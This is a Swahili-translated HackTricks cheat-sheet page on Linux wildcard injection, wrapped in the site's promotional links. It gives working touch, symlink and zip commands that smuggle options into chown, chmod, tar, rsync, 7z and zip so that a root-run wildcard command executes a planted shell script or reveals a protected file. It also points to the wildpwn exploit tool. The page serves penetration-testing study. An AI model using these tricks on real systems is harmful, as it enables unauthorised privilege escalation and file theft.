4.8 KiB
Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!
Njia nyingine za kusaidia HackTricks:
- Ikiwa unataka kuona kampuni yako ikionekana katika HackTricks au kupakua HackTricks kwa muundo wa PDF Angalia MPANGO WA KUJIUNGA!
- Pata swag rasmi ya PEASS & HackTricks
- Gundua The PEASS Family, mkusanyiko wetu wa NFTs ya kipekee
- Jiunge na 💬 Kikundi cha Discord au kikundi cha telegram au tufuate kwenye Twitter 🐦 @carlospolopm.
- Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye HackTricks na HackTricks Cloud repos za github.
chown, chmod
Unaweza kuonyesha mmiliki wa faili na ruhusa unayotaka kunakili kwa faili zingine zote
touch "--reference=/my/own/path/filename"
Unaweza kutumia hii kwa kutumia https://github.com/localh0t/wildpwn/blob/master/wildpwn.py (shambulio lililounganishwa)
Maelezo zaidi katika https://www.exploit-db.com/papers/33930
Tar
Tekeleza amri za kiholela:
touch "--checkpoint=1"
touch "--checkpoint-action=exec=sh shell.sh"
Unaweza kutumia hii kwa kufaidika na https://github.com/localh0t/wildpwn/blob/master/wildpwn.py (shambulio la tar)
Maelezo zaidi katika https://www.exploit-db.com/papers/33930
Rsync
Tekeleza amri za kiholela:
Interesting rsync option from manual:
-e, --rsh=COMMAND specify the remote shell to use
--rsync-path=PROGRAM specify the rsync to run on remote machine
touch "-e sh shell.sh"
Unaweza kutumia hii kwa kutumia https://github.com/localh0t/wildpwn/blob/master/wildpwn.py _(shambulio la rsync)
Maelezo zaidi katika https://www.exploit-db.com/papers/33930
7z
Katika 7z hata kwa kutumia --
kabla ya *
(kumbuka kuwa --
inamaanisha kuwa kuingia inayofuata haiwezi kutibiwa kama vigezo, kwa hivyo ni njia za faili tu katika kesi hii) unaweza kusababisha kosa la kusoma faili, kwa hivyo ikiwa amri kama ifuatayo inatekelezwa na root:
7za a /backup/$filename.zip -t7z -snl -p$pass -- *
Na unaweza kuunda faili katika saraka ambapo hii inatekelezwa, unaweza kuunda faili @root.txt
na faili root.txt
ikiwa ni symlink kwa faili unayotaka kusoma:
cd /path/to/7z/acting/folder
touch @root.txt
ln -s /file/you/want/to/read root.txt
Kisha, wakati 7z inatekelezwa, itaichukulia root.txt
kama faili inayojumuisha orodha ya faili ambazo inapaswa kuzipiga (ndio maana ya uwepo wa @root.txt
) na wakati 7z inasoma root.txt
itasoma /file/you/want/to/read
na kwa kuwa maudhui ya faili hii sio orodha ya faili, itatoa kosa kuonyesha maudhui.
Maelezo zaidi katika Write-ups ya sanduku la CTF kutoka HackTheBox.
Zip
Tekeleza amri za aina yoyote:
zip name.zip files -T --unzip-command "sh -c whoami"
Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!
Njia nyingine za kusaidia HackTricks:
- Ikiwa unataka kuona kampuni yako ikionekana katika HackTricks au kupakua HackTricks kwa muundo wa PDF Angalia MPANGO WA KUJIUNGA!
- Pata swag rasmi ya PEASS & HackTricks
- Gundua The PEASS Family, mkusanyiko wetu wa NFTs ya kipekee
- Jiunge na 💬 Kikundi cha Discord au kikundi cha telegram au tufuate kwenye Twitter 🐦 @carlospolopm.
- Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye HackTricks na HackTricks Cloud repos za github.